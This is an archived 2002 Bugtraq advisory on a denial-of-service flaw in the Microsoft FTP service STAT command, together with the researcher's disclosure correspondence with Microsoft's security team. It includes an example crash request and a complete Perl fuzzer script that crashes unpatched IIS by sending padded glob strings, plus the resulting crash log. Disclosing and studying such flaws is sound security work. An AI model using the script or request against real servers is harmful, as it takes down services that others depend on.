Bugtraq mailing list archives
Microsoft FTP Service STAT Globbing DoS
From: H D Moore <sflist () digitaloffense net>
Date: Tue, 16 Apr 2002 20:33:36 -0500
A copy of this document can be found online at:
http://www.digitaloffense.net/msftpd/advisory.txt
-----------------------------------------------------------------------------------------------
--[ Microsoft FTP Service STAT Globbing DoS
Summary:
The Microsoft FTP service is vulnerable to a Denial of Service
attack in the STAT command. This DoS can be triggered by a remote
attacker using either a valid user account or the anonymous account,
which is enabled by default. Once exploited, all services running
under the inetinfo.exe process will terminate. On IIS 5.0 and above,
these services are supposed to restart, on IIS 4.0 the services must
be restarted manually. This vulnerability appears to be impossible to
exploit to gain a remote command shell. Versions other than 4.0 and
5.0 were not tested. Microsoft's advisory and a link to a patch is
available online at:
http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
Details:
This vulnerability was discovered in November 2001 by a "fuzzer"
script I wrote to audit FTP daemons for problems in the globbing
functionality. This script created and sent random arguments to the
"STAT" command consisting of various combinations of globbing
characters. The original fuzzer had to be modified to use the Windows
glob characters instead of the normal Unix set. Within 20 seconds the
script had caused an access violation on a fully patched IIS server.
An example request which can cause the crash:
STAT ?*<240 x X>
The crash occurs when a memchr call is passed a pointer which
dereferences to a NULL. It may be possible to overwrite this memory
with an arbitrary path and use this exploit to obtain a directory
listing, but all attempts so far have failed and constantly
restarting IIS and retrying was getting old.
Scripts:
(DoS PoC)
http://www.digitaloffense.net/msftpd/msftp_dos.pl
(Original "Fuzzer")
http://www.digitaloffense.net/msftpd/msftp_fuzz.pl
Credits:
The following people helped in one form or another:
* bind
* rkl
* halvar
* tsnoop
* ah / da (vulnhelp)
History:
Microsoft was notified of this vulnerability on December 2nd, 2001
through the SecurityFocus VulnHelp service. This vulnerability was
made "public" in early February at the SANS Network Security
Bootcamp conference in Monterey, CA. Complete details about this
vulnerability as well as a example perl script have been available
from the Digital Offense web site since then. This was due to a
miscommunication about the availability of a patch between myself and
the Microsoft Security team. This confusion came about because
another reported vulnerability had been silently fixed as part of the
SP2 Security Rollup 1 Update and this vulnerability was assumed to
have been fixed as well. When I asked MS about this later, they
responded saying that they would announce the other vulnerability (MS
SMTP BDAT DoS) during the _NEXT_ security update and the fix for this
one was being held back until the IIS developers released a jumbo
patch for all currently reported problems. Considering that they were
told 3 months previous that people were actively developing exploits
for this issue and now a few hundred people had been informed about
it at the conference, I found their unwillingness to release a hotfix
absurd. The entire email exchange is listed below.
--[ Email History
[ The Original VulnHelp Email ]
Microsoft FTP Daemon STAT Globbing Bug
Date: Sun, 2 Dec 2001 20:04:28 -0600
From: H D Moore <hdm () digitaloffense net>
To: vulnhelp () securityfocus com
The Microsoft FTP Service (5.0) crashes when a certain combination of
glob strings are passed to the STAT command. I was unable to control
the address of the crash, but since there is ample methods of placing
user data into memory, Im sure someone will be able to exploit it
given enough time. The perl code below should be sufficent to
demonstrate the problem.
As for a deadline on releasing a patch or making a public
announcement, the sooner the better, there are already a few people
developing exploits for it.
---------------------------------------------------------------------
#!/usr/bin/perl -w
##################
# cheezy perl to fuzz ftp globs
# this one is designed for msftpd and STAT
use Net::FTP;
srand(time() + int($$));
$target = shift() || "127.0.0.1";
my $user = "anonymous";
my $pass = "crash\@burn.com";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) ||
die "could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/pub");
# crash it
while (1)
{
$g = GetGlob();
print STDERR "Trying: $g\n";
$ret = $ftp->quot("STAT $g");
if ($ret !~ /^2/)
{
print "Error: FTP server returned an error response.\n";
exit(1);
}
}
$ftp->quit;
sub GetGlob {
my $result;
$len = 45;
@globs = split(//, "?.\\*");
# build a string consisting of random sequencs
# of the glob character array
for (1 .. $len)
{
$result .= $globs[int(rand() * scalar(@globs))];
}
# this provides some padding which is required
# for the daemon to crash. my guess is that an
# internal file name buffer is being overflowed
# when a glob result string and a large char string
# are combined, the length isnt checked.
$result .= "A" x 200;
return $result;
}
__END__
Only tested on Windows 2000 / MSFTPD 5.0 / Full Patches/ SP2:
Event Type: Information
Event Source: Application Popup
Event Category: None
Event ID: 26
Date: 12/2/2001
Time: 3:37:27 PM
User: N/A
Computer: SHATTERED
Description:
Application popup: inetinfo.exe - Application Error : The instruction
at "0x6fc6a35c" referenced memory at "0x00000000". The memory could
not be "written".
Click on OK to terminate the program
Click on CANCEL to debug the program
[ The Initial Microsoft Response ]
RE: [MSRC 961lt] Notification of Security Vulnerability
Date: Mon, 3 Dec 2001 17:45:14 -0800
From: "Microsoft Security Response Center" <secure () microsoft com>
To: "Vulnerability Help" <vulnhelp () securityfocus com>
Cc: <hdmoore () digitaloffense net>, "Microsoft Security Response Center"
<secure () microsoft com>
Hi -
Thanks very much for your note. I'll start an investigation of this
issue immediately, and will let you know what I find out. In the
meantime, I've assigned tracking number MSRC 961 to this issue. If
you would keep it in the subject line of future notes on the subject,
it would make it easier to get status information for you.
Regards
Secure () microsoft com
[ The Confirmation from Microsoft ]
RE: [MSRC 961lt] Notification of Security Vulnerability
Date: Tue, 8 Jan 2002 08:55:38 -0800
From: "Microsoft Security Response Center" <secure () microsoft com>
To: <hdmoore () digitaloffense net>
Cc: "Microsoft Security Response Center" <secure () microsoft com>
Hi,
I just wanted to update you and let you know that we have successfully
reproduced this issue and plan on fixing it in the next rollup patch
for IIS. We really appreciate you bringing this problem to our
attention and will update you on the timetable for release. I am not
sure yet where we are with the next IIS rollup but as soon as I learn
I will update you again.
Thanks for your email and for working with us.
Kind regards,
secure () microsoft com
[ My Response ]
Re: [MSRC 961lt] Notification of Security Vulnerability
Date: Tue, 15 Jan 2002 11:50:28 -0600
From: H D Moore <hdm () digitaloffense net>
To: "Microsoft Security Response Center" <secure () microsoft com>,
<hdmoore () digitaloffense net>
Cc: "Microsoft Security Response Center" <secure () microsoft com>
Will this patch also fix the SMTP BDAT crash reported a month
previously?
[ Their Response ]
RE: [MSRC 961lt] Notification of Security Vulnerability
Date: Tue, 15 Jan 2002 12:45:55 -0800
From: "Microsoft Security Response Center" <secure () microsoft com>
To: "H D Moore" <hdm () digitaloffense net>
Cc: "Microsoft Security Response Center" <secure () microsoft com>
Hi,
Thanks for your note. The SMTP BDAT issue is separate and will be
addressed in another patch.
Regards,
secure () microsoft com
[ My Response ]
Re: [MSRC 961lt] Notification of Security Vulnerability
Date: Fri, 15 Feb 2002 01:48:44 -0600
From: H D Moore <hdm () secureaustin com>
To: "Microsoft Security Response Center" <secure () microsoft com>
Do you have an ETA on when the FTP issue will be fixed? The reason I
ask is that I (mistakenly) assumed that the SP2SR1 patch already
solved this problem and included the vulnerability in a presentation
at a recent SANS conference.
The reason for the confusion was simple, the SP2SR1 patch mentioned
many fixes related to IIS services, and a quick glance showed that it
addressed an issue with pattern-matching in the FTP service. Based on
your previous message, I assumed this was the correct patch for it and
let the cat out of the bag.
The SP2SR1 patch did fix the SMTP BDAT bug, which I did verify before
presenting the information. The materials are online, including a
script to verify the existence of the vulnerability. I have no problem
pulling the script off the site for the interim, but the attendees at
the conference already have copies of the slides which contain enough
information to exploit the bug...
URL for the conference materials:
http://www.digitaloffense.net/confs/bootcamp02/
Direct link to the slide addressing this bug:
http://www.digitaloffense.net/confs/bootcamp02/jpeg/smash/Slide67.html
On Tuesday 15 January 2002 02:45 pm, Microsoft Security Response
Center wrote:
Hi, Thanks for your note. The SMTP BDAT issue is separate and will be addressed in another patch. Regards, secure () microsoft com -----Original Message----- From: H D Moore [mailto:hdm () digitaloffense net] Sent: Tuesday, January 15, 2002 9:50 AM To: Microsoft Security Response Center; hdmoore () digitaloffense net Cc: Microsoft Security Response Center Subject: Re: [MSRC 961lt] Notification of Security Vulnerability On Tuesday 08 January 2002 10:55 am, Microsoft Security
Response Center wrote:
Hi, I just wanted to update you and let you know that we have successfully reproduced this issue and plan on fixing it in the next rollup patch for IIS. We really appreciate you bringing this problem to our attention and will update you on the timetable for release. I am not sure yet where we are with the next IIS rollup but as soon as I learn I will update you again. Thanks for your email and for working with us. Kind regards, secure () microsoft comWill this patch also fix the SMTP BDAT crash reported a month previously?
[ Their Response ] RE: [MSRC 961lt] Notification of Security Vulnerability Date: Mon, 18 Feb 2002 12:10:40 -0800 From: "Microsoft Security Response Center" <secure () microsoft com> To: "H D Moore" <hdm () digitaloffense net> Cc: "Microsoft Security Response Center" <secure () microsoft com> Hi, I appreciate your note and your candor. I've forwarded this to the IIS folks to see if we can seriously speed up the rollup or if we need to work on an individual hotfix for your FTP issue MSRC 961. In regards to the BDAT issue, we replied to them on Nov 18. I enclose the correspondence for your review. Please let me know if there is some misunderstanding because we received the report from them and responded back to them. I was under the impression that they would handle getting the response back to you. In the second email, they note that they received our mail. Please let me know if we are missing something on our end. I am concerned about this. Regards, secure () microsoft com -----Original Message----- From: H D Moore [mailto:hdm () digitaloffense net] Sent: Monday, February 18, 2002 2:28 AM To: Microsoft Security Response Center Cc: Microsoft Security Response Center Subject: Re: [MSRC 961lt] Notification of Security Vulnerability On Friday 15 February 2002 10:28 am, Microsoft Security Response Center wrote:
Hi, The FTP issue is due to come out in an IIS rollup patch. We are pushing the priority of this patch because we feel there are issues that merit one sooner rather than later. I would look for it in the coming month - even though I cannot guarantee it I feel fairly firm on this. The IIS devs are really working with us and understand the reasons we are pushing.
The initial email I sent through vuln-help (early December) stated the vulnerability had become known to a handful of people, and that those people were actively developing exploits for it. The bug was determined to be non-exploitable (in a remote command shell granting way), but the DoS aspect is trivial to reproduce. It has been two months now and I am positive that there are people actually taking advantage of this in the wild.
In regards to presenting this issue at a conference, it seems to me to be an honest mistake. Unless you feel that this vulnerability is being exploited in the wild, I would still like the IIS rollup to be the ship vehicle. Please let me know your thoughts - I am sincerely interested.
I am already getting a flood of email about details of this vulnerability and the availability of patches. So far, I have been recommending to just disable anonymous access and sit it out a month, but a hard release date would be preferable. I would feel much better about the whole situation if it wasn't for the way the SMTP BDAT bug was handled. A notification was sent through vuln-help on November 13th, 2001, yet I received no response on it until January 15th, 2002. To make matters worse, the SP2SR1 silently fixed this bug, with no mention of it in the online documentation, and no notification was ever sent to me stating that this patch addressed the bug. This bug will become public knowledge today.
Thanks for the update. Let me know if there is anything else we can do.
When will the IIS rollup patch be available? If there will be more than a week's delay, would it be possible to release a hotfix for it instead?
Current thread:
- Microsoft FTP Service STAT Globbing DoS H D Moore (Apr 16)